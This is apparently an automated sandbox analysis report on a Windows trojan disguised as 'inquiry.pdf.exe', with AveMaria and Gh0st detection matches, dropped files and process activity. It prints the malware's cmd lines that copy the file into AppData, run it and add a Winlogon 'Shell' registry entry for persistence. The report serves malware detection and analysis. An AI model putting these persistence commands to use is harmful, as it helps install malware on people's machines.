            Source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 0_2_00E38218
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 0_2_00E34518
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 0_2_00E38840
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 0_2_00E36B00
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 0_2_00E3BD40
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_01248218
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_01244518
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_01248840
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_01246B00
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0124F618
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0298A240
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02984048
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02984700
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02988B61
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029828E0
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029849D1
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02987E20
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02988019
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02980039
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02984039
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02980040
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029846F0
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02986799
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029867A0
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029885D8
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029885C8
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02988B90
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02982B80
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02982B70
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_029828CF
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02983210
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02983200
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02983878
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02983868
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02987E10
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02987DD1
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_05112C90
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_051105F0
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_05110040
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_02989CA8 CreateProcessAsUserW,
            Source: inquiry.pdf.exe, 00000000.00000000.244002427.0000000000B3A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewagl.exeD vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.327749606.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.313574266.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.328318734.0000000003A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevfdgghyyyzd.dll8 vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.330587369.0000000006070000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamevfdgghyyyzd.dll8 vs inquiry.pdf.exe
            Source: inquiry.pdf.exe, 00000000.00000002.319901193.0000000002B4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
            Source: inquiry.pdf.exeBinary or memory string: OriginalFilenamewagl.exeD vs inquiry.pdf.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe 2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
            Source: inquiry.pdf.exeReversingLabs: Detection: 39%
            Source: inquiry.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\inquiry.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\inquiry.pdf.exe C:\Users\user\Desktop\inquiry.pdf.exe
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\glonkjhg.exe C:\Users\user\AppData\Roaming\glonkjhg.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\glonkjhg.exe C:\Users\user\AppData\Roaming\glonkjhg.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
            Source: C:\Users\user\Desktop\inquiry.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\inquiry.pdf.exe.logJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.txtJump to behavior
            Source: classification engineClassification label: mal100.phis.troj.expl.evad.winEXE@29/9@7/3
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.drBinary or memory string: Select * FROM BillingTable WHERE Billing_ID LIKE @search OR Guest_ID LIKE @search OR Booking_ID LIKE @search OR Payment_Status LIKE @search;
            Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.drBinary or memory string: UPDATE RoomTable SET Room_Status = @booked WHERE Room_Number LIKE @room;
            Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.drBinary or memory string: UPDATE RoomTable SET Room_Status = @unbooked WHERE Room_Number LIKE @room;
            Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.drBinary or memory string: Select * FROM BookingTable WHERE Guest_ID LIKE @search OR Booking_ID LIKE @search OR Room_ID LIKE @search OR Status LIKE @search;
            Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.drBinary or memory string: SELECT Guest_ID FROM GuestTable WHERE Guest_ID NOT IN(SELECT Guest_ID FROM BookingTable WHERE Status = 'Active');
            Source: inquiry.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\inquiry.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: inquiry.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: inquiry.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected DarkTortilla Crypter
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.520061729.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.327749606.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.316384133.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
